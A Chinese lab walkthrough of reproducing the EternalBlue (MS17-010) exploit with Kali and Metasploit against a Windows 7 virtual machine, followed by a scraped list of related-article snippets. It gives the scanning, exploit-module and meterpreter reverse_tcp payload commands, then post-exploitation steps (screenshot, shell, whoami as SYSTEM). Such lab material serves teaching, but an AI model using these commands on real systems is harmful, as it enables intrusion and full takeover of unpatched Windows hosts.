永恒之蓝从渗透的复现

article/2025/8/21 10:16:54

永恒之蓝又称为勒索病毒,同样这个漏洞成为了黑客现在训练的好方式(记住千万不可以攻击别人的电脑),这个漏洞在win7中十分常见,而永恒之蓝对应的是445端口,所以说我们将用win7虚拟机(受害者)与kali(攻击者)进行演示,这个渗透的步骤应该是我们需要最为注意的。(这两个虚拟机的网络连接方式必须一样同为nat模式)

1:打卡kali与win7的虚拟机。

dc3c88ae223e4e1187fca619eef8ca37.png

5e32c422b8f941d6a1db783c743563d1.png

这是我的kali与win7的虚拟机。

2:在渗透的第一步我们需要知道自己kali的基本IP地址。命令:ifconfig

a6e945103282461bb6a8f94325e2618c.png

需在这里注意的是在ifconfig下面的eth0是指网卡的名称,同样在inet后面的是你kali的IP地址。kali的地址是192.168.134.128。

3:现在是准备攻击的阶段,要知道《孙子兵法》有云知己知彼,百战不殆,现在只是知道自己了,所以我们还要知道win7的IP等基本信息。在同一个模式下可以使用工具(nmap)来进行扫描,来看一下对应靶机有没有存活与对应win7的IP与端口情况。

b64a8a702eaf45dabf89de7ac2c1d293.png

这里的命令是nmap+ip(前三位)+0/24这是查询在134这个网段下所有存活的 IP地址情况,这里你会看见很多的134的地址,这里有网关,有网络地址,但是可以看到的是192.168.134.131,是最为详细的,其实这个就是win7的IP地址,并且我们知道了445端口其实是开放的。发现445端口是开放的就可以进行攻击。

4:打开metasploit(一个渗透的工具,kali自带)命令为msfconsole

710fa53ba28b4e5eb354e5014c6e8459.png

注意打开的时候每一次的页面都是不一样 ,所以说如果你打开的与我不一样很正常,没有关系的。

5:启动后搜索对应的ms17-010(即为永恒之蓝)模块对应的信息。命令为search ms17-010

d6164b2c0ea34414b4011cb510cbb473.png

6:注意这里的exploit是攻击模块,而这里的auxiliary是辅助模块,我们这里用3来确定这个漏洞是否存在,但是需要注意的是这几个模块在所有电脑中并不一样,所以需注意。命令为use 3,之后看一下需要修改的参数,命令为show options

91d6e71df9444466a3e8a1672f01625e.png

在这里发现rhost后面是yes必须填,但是他并没有填这里的东西,所以这就是我们需要填的

7:设置攻击目标,命令set rhost +ip 39d507a17b964ab285a701cf0a6d1380.png

 这里我们就发现rhost已经是win7的IP了,这里指的是rhost指的是受害者

8:运行扫描模块可以发现靶机确实存在ms17-010漏洞。命令:run

c04d8ea1ce7d4bf48de581af050df4b4.png

9:开始使用0模块进行攻击,命令:use 0

3e235b15c7014f9787959ccbd31e1b32.png

 10:开始最后的设置,设置默认的攻击载荷:set payload windows/x64/meterpreter/reverse_tcp

        设置rhost,命令为set rhost 192.168.134.131

         设置lhost,命令为set lhost 192.168.134.128

46cf3fd177bd4da08b53b4cfe84dbc5f.png

 11:检查参数,准备攻击

8521f89821fe4c7c9cb0fbd12495b4e4.png

完成攻击,win

12:后渗透攻击就是你渗透进去的时候,可以干一些事情,

首先最为基础的就是截屏命令为screenshot

d06f7e97e5314a8fac4f5b426e3a304f.png

你会发现win7的页面已经到我的文件夹里了,这是试想如果你在 看一些公司的机密文件之类的一截屏,完蛋!

接着还可以查看这个你的电脑的权限,用getuid,再用shell进入你的电脑

9f56a8f5ac7a492c8c644f378fd2e836.png

中间有一行打错了望大家见谅,这里就已经潜入了你的电脑内部。

直接在命令行打shell就是进入了对面的dos系统。这就是win的基本命令了

b7c41e06b358418d8cd552ddb0e83a74.png

之后你可以查看一些文件,并并可以查看当前权限,命令whoami

0cfeced00a4240c6b2fb5abd65c30eb9.png

 大家可以看到这就是system系统。

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 


http://chatgpt.dhexx.cn/article/QUaPrREw.shtml

相关文章

永恒之蓝(Eternal Blue)复现

永恒之蓝介绍 什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝…

kali与永恒之蓝

kali永恒之蓝攻击 写在前面一、永恒之蓝是何方神圣?二、神马是SMB协议?三、MSF四、攻击步骤1、攻击主机与靶机配置2、攻击步骤 五、种植后门 写在前面 这是我的第一篇CSDN博客,最近又参加了一个CTF比赛,当然,纯属兴趣爱…

利用虚拟机复现漏洞 “永恒之蓝”

利用虚拟机复现漏洞“永恒之蓝” 攻击:kali Linux 2020.3 靶机:Windows Server 2008 R2 x64 下面详细讲述测试的过程。 —— —— “ 永恒之蓝 ”简介 利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。于 2017 年在全球的范围内大面积爆发&#…

永恒之蓝简介

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改…

永恒之蓝-永恒之蓝漏洞(linux)

扫描存活主机 fping -a -g 192.168.52.1 192.168.56.254 ,因为kali是192.168.52.134,所以win2003是192.168.52.133 像192.168.52.2或者192.168.52.1这种不用管,一般是网关 开启msfconsole 搜索载荷,永恒之蓝的载荷是ms17_010 …

永恒之蓝漏洞复现

一,永恒之蓝 一、漏洞简介\n1、永恒之蓝介绍:\n永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局&#xff09…

永恒之蓝靶场

声明:本文仅限交流学习使用,请勿使用在任何非法商业活动,禁止用于非法用途。否则后果自负。如有侵权,请告知删除,谢谢! 在虚拟机上搭建win7环境(靶机) 攻击者kali2021版: 模拟永恒之蓝攻击过程的话,需要win7(靶机&…

永恒之蓝复现

目录 1.知识点: 2.前提准备 3.复现 1.知识点: (永恒之蓝适应低版本的电脑没有打ms17_010的补丁,现在win7以上的高版本已经不可以使用) 百度百科:永恒之蓝是指2017年4月14日晚,黑客团体Shadow…

永恒之蓝MS17-010漏洞复现

永恒之蓝漏洞复现 永恒之蓝漏洞简介准备工作命令功能查询靶机IP地址Nmap工具Msf框架相关搜索指令如下设置扫描对象扫描对方是否存在445端口开始攻击 设置攻击载荷设置攻击机及靶机攻击成功简单演示攻击结束 永恒之蓝漏洞简介 本次漏洞复现主要展示如何复现一次永恒之蓝漏洞攻击…

kali之永恒之蓝使用流程(操作全套步骤)

第一步需要kali系统的电脑和win7系统电脑的ip的地址在同一网段,互相之间可以ping通。 第二步关闭win7系统的防火墙。 往往失败就是这两部分的错误。 下边开始进入正题。 打开我们的kali系统,永恒之蓝控制版面开启指令 :msfconsole 小马图…

网络攻防——永恒之蓝

永恒之蓝 1.引言2.永恒之蓝定义3.SMB协议3.windows7版本说明4.攻击实例4.1攻击者和被攻击者展示4.2详细攻击过程4.3接下来尝试攻击一下windows10 5.参考文献 1.引言 让一个不爱学习的人整天蒙英语题,听张宇的视频实在是枯燥了点,于是决定看看网安&#x…

Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)

目录 一、永恒之蓝概述 二、SMB协议 三、准备工作 四、漏洞复现 1、主机发现 2、端口扫描 3、利用模块 五、演示功能 1.获取cmd 2.捕获屏幕 3.上传文件 4.下载文件 5.远程登录 6.上传后门 7.免杀加壳 8.运行wannacry 9.清除日志 六、预防方案 1.打开防火墙 …

ajax提交form表单+跨域

有时候我们需要提交form表单&#xff0c;而又不想影响跳转页面&#xff0c;同时还不影响浏览器的 正常访问&#xff0c;这个时候就用到了ajax提交 首先&#xff0c;要引入js文件 <script type"text/javascript" src"${ctx}/newoa/js/jquery.form.js"…

使用原生javascript实现ajax提交form表单

使用原生javascript实现ajax提交form表单 ============================ 1 准备表单 首先我们需要编写一个html代码,这里我是采用nodejs里面的jade模板引擎来进行生成html代码的。 form(action="/ajaxTest2",method="post",enctype="text/…

Jquery Ajax提交form表单

ajax技术带给我们的是良好的用户体验,同时,使用jquery可以简化开发,提高工作效率。 献上一个简单的例子: 前台代码: index.aspx <%@ Page Language="C#" AutoEventWireup="true" CodeBehind="index.aspx.cs" Inherits="AjaxDemo…

客户端调用服务端异常 —— 远程主机强迫关闭了一个现有的连接**(问题已解决)

客户端调用服务端异常 —— 远程主机强迫关闭了一个现有的连接&#xff08;问题已解决&#xff09; 今天跟大家分享一个日常出现的问题&#xff0c;今天前段调用的时候突然出现了远程主机强迫关闭了一个现有的连接的问题&#xff0c;先看问题图。 然后开始排查原因&#xff0…

频繁发送socket命令返回:[WinError 10054] 远程主机强迫关闭了一个现有的连接

第一类 错误原因&#xff1a;发送http请求太过频繁&#xff0c;引起远程主机的怀疑&#xff0c;被网站怀疑是恶意攻击行为。 解决方法&#xff1a; 在发送命令之后关闭连接&#xff0c;防止被认为恶意连接设置socket默认等待时间 设置读取信息的最大时间限制&#xff0c;如果…

关于Redis出现“java.io.IOException: 远程主机强迫关闭了一个现有的连接”的一次排查

背景 最近在使用springboot&#xff08;Windows下&#xff09;连接redis&#xff08;云服务器&#xff09;开发时发现一些问题&#xff1a;连接成功的情况下&#xff0c;在一段时间未交互数据后&#xff0c;再次通过连接与Redis传输数据回出现异常java.io.IOException: 远程主…

远程主机强迫关闭了一个现有的连接.

报错信息&#xff1a; 解决方法&#xff1a; 1.在命令行中查找占用“5037”端口的程序PID netstat -aon|findstr “5037”2. 打开任务管理器&#xff0c;找到相应的PID【15692】&#xff0c;将占用的端口关闭。 3. 发现adb.exe与Android Studio.exe共用同一个端口 adb.exe——…

xdm,请求帮助

这个怎么搞&#xff0c;xdm